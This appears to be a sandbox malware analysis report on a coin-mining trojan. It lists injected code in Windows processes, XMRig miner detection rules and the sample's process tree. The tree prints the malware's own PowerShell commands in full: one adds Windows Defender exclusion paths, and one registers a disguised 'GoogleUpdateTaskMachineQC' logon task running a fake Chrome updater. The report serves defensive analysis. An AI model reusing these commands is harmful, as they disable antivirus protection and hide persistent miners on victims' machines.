Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027920DC	10_2_0000026E027920DC
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027A1658	10_2_0000026E027A1658
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E0279B23C	10_2_0000026E0279B23C
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027CFEF8	10_2_0000026E027CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027CBC30	10_2_0000026E027CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027C2CDC	10_2_0000026E027C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027D2258	10_2_0000026E027D2258
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027CBE3C	10_2_0000026E027CBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEEE20DC	11_2_000001C6CEEE20DC
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEEEB030	11_2_000001C6CEEEB030
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEEEF2F8	11_2_000001C6CEEEF2F8
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEEF1658	11_2_000001C6CEEF1658
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEEEB23C	11_2_000001C6CEEEB23C
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF12CDC	11_2_000001C6CEF12CDC
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF1BC30	11_2_000001C6CEF1BC30
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF1FEF8	11_2_000001C6CEF1FEF8
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF22258	11_2_000001C6CEF22258
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF1BE3C	11_2_000001C6CEF1BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF420DC	11_2_000001C6CEF420DC
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF4B030	11_2_000001C6CEF4B030
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF4F2F8	11_2_000001C6CEF4F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF51658	11_2_000001C6CEF51658
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF4B23C	11_2_000001C6CEF4B23C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304F820DC	12_2_0000025304F820DC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304F8B030	12_2_0000025304F8B030
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304F91658	12_2_0000025304F91658
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304F8B23C	12_2_0000025304F8B23C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304F8F2F8	12_2_0000025304F8F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FB2CDC	12_2_0000025304FB2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FBBC30	12_2_0000025304FBBC30
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FC2258	12_2_0000025304FC2258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FBBE3C	12_2_0000025304FBBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FBFEF8	12_2_0000025304FBFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2113B030	13_2_0000016C2113B030
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211320DC	13_2_0000016C211320DC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2113F2F8	13_2_0000016C2113F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2113B23C	13_2_0000016C2113B23C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C21141658	13_2_0000016C21141658
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2116BC30	13_2_0000016C2116BC30
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C21162CDC	13_2_0000016C21162CDC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2116FEF8	13_2_0000016C2116FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2116BE3C	13_2_0000016C2116BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C21172258	13_2_0000016C21172258
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211CBC30	13_2_0000016C211CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211C2CDC	13_2_0000016C211C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211CFEF8	13_2_0000016C211CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211CBE3C	13_2_0000016C211CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211D2258	13_2_0000016C211D2258
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F47BDB030	14_2_0000026F47BDB030
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F47BDF2F8	14_2_0000026F47BDF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F47BDB23C	14_2_0000026F47BDB23C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F47BE1658	14_2_0000026F47BE1658
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F47BD20DC	14_2_0000026F47BD20DC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F48142CDC	14_2_0000026F48142CDC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F4814BE3C	14_2_0000026F4814BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F48152258	14_2_0000026F48152258
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F4814FEF8	14_2_0000026F4814FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F4814BC30	14_2_0000026F4814BC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B91DD20DC	15_2_0000029B91DD20DC
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B91DDB030	15_2_0000029B91DDB030
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B91DDF2F8	15_2_0000029B91DDF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B91DE1658	15_2_0000029B91DE1658
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B91DDB23C	15_2_0000029B91DDB23C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B92352258	15_2_0000029B92352258
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B9234BE3C	15_2_0000029B9234BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B9234FEF8	15_2_0000029B9234FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B9234BC30	15_2_0000029B9234BC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B92342CDC	15_2_0000029B92342CDC
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923B2258	15_2_0000029B923B2258
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923ABE3C	15_2_0000029B923ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923AFEF8	15_2_0000029B923AFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923ABC30	15_2_0000029B923ABC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923A2CDC	15_2_0000029B923A2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AABC30	16_2_0000020422AABC30
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AA2CDC	16_2_0000020422AA2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AABE3C	16_2_0000020422AABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AB2258	16_2_0000020422AB2258
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AAFEF8	16_2_0000020422AAFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287BBE3C	17_2_00000206287BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287C2258	17_2_00000206287C2258
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287BFEF8	17_2_00000206287BFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287BBC30	17_2_00000206287BBC30
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287B2CDC	17_2_00000206287B2CDC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847125B23C	20_2_000002847125B23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_0000028471261658	20_2_0000028471261658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847125F2F8	20_2_000002847125F2F8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847125B030	20_2_000002847125B030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_00000284712520DC	20_2_00000284712520DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847139BE3C	20_2_000002847139BE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_00000284713A2258	20_2_00000284713A2258
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847139FEF8	20_2_000002847139FEF8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847139BC30	20_2_000002847139BC30
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_0000028471392CDC	20_2_0000028471392CDC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847197F2F8	20_2_000002847197F2F8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847197B23C	20_2_000002847197B23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_0000028471981658	20_2_0000028471981658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_00000284719720DC	20_2_00000284719720DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847197B030	20_2_000002847197B030
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00000182924DB030	21_2_00000182924DB030
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00000182924D20DC	21_2_00000182924D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00000182924DB23C	21_2_00000182924DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00000182924E1658	21_2_00000182924E1658
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00000182924DF2F8	21_2_00000182924DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001829254BC30	21_2_000001829254BC30
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0000018292542CDC	21_2_0000018292542CDC
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001829254BE3C	21_2_000001829254BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0000018292552258	21_2_0000018292552258
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001829254FEF8	21_2_000001829254FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA6BC30	24_2_000001BB3DA6BC30
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA6FEF8	24_2_000001BB3DA6FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA6BE3C	24_2_000001BB3DA6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA72258	24_2_000001BB3DA72258
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA62CDC	24_2_000001BB3DA62CDC
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF4BC30	25_2_0000029ABCF4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF42CDC	25_2_0000029ABCF42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF52258	25_2_0000029ABCF52258
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF4BE3C	25_2_0000029ABCF4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF4FEF8	25_2_0000029ABCF4FEF8
Source: C:\Windows\System32\dialer.exe	Code function: 26_2_00007FF6101914E4	26_2_00007FF6101914E4
Source: C:\Windows\System32\dialer.exe	Code function: 26_2_00007FF610192328	26_2_00007FF610192328
Source: C:\Windows\System32\dialer.exe	Code function: 26_2_00007FF610191DB4	26_2_00007FF610191DB4
Source: C:\Windows\System32\dialer.exe	Code function: 26_2_00007FF6101926E8	26_2_00007FF6101926E8
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DAB030	28_2_0000025E81DAB030
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DAF2F8	28_2_0000025E81DAF2F8
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DAB23C	28_2_0000025E81DAB23C
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DB1658	28_2_0000025E81DB1658
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DA20DC	28_2_0000025E81DA20DC
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DDBC30	28_2_0000025E81DDBC30
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DDFEF8	28_2_0000025E81DDFEF8
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DDBE3C	28_2_0000025E81DDBE3C
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DE2258	28_2_0000025E81DE2258
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DD2CDC	28_2_0000025E81DD2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD5F2F8	29_2_000001CD9AD5F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD5B23C	29_2_000001CD9AD5B23C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD61658	29_2_000001CD9AD61658
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD520DC	29_2_000001CD9AD520DC
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD5B030	29_2_000001CD9AD5B030
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD8FEF8	29_2_000001CD9AD8FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD8BE3C	29_2_000001CD9AD8BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD92258	29_2_000001CD9AD92258
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD82CDC	29_2_000001CD9AD82CDC
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD8BC30	29_2_000001CD9AD8BC30
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C3620DC	31_2_000002AF8C3620DC
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C36B23C	31_2_000002AF8C36B23C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C371658	31_2_000002AF8C371658
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C36F2F8	31_2_000002AF8C36F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C36B030	31_2_000002AF8C36B030
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C392CDC	31_2_000002AF8C392CDC
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C39BE3C	31_2_000002AF8C39BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C3A2258	31_2_000002AF8C3A2258
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C39FEF8	31_2_000002AF8C39FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C39BC30	31_2_000002AF8C39BC30

Source: h2qWqtD73F.exe	Static PE information: Number of sections : 11 > 10
Source: updater.exe.0.dr	Static PE information: Number of sections : 11 > 10

Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: updater.exe PID: 7012, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@22/79@0/0

Source: C:\Windows\System32\dialer.exe	Code function: 5_2_00007FF67E6C2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		5_2_00007FF67E6C2328
Source: C:\Windows\System32\dialer.exe	Code function: 26_2_00007FF610192328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		26_2_00007FF610192328

Source: C:\Windows\System32\dialer.exe

Code function: 5_2_00007FF67E6C1AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

5_2_00007FF67E6C1AC4

Source: C:\Windows\System32\dialer.exe

Code function: 5_2_00007FF67E6C2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

5_2_00007FF67E6C2328

Source: C:\Users\user\Desktop\h2qWqtD73F.exe

File created: C:\Users\user\AppData\Roaming\Google

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03

Source: C:\Users\user\Desktop\h2qWqtD73F.exe

File created: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmp

Jump to behavior

Source: h2qWqtD73F.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\h2qWqtD73F.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: h2qWqtD73F.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\h2qWqtD73F.exe

File read: C:\Users\user\Desktop\h2qWqtD73F.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\h2qWqtD73F.exe "C:\Users\user\Desktop\h2qWqtD73F.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
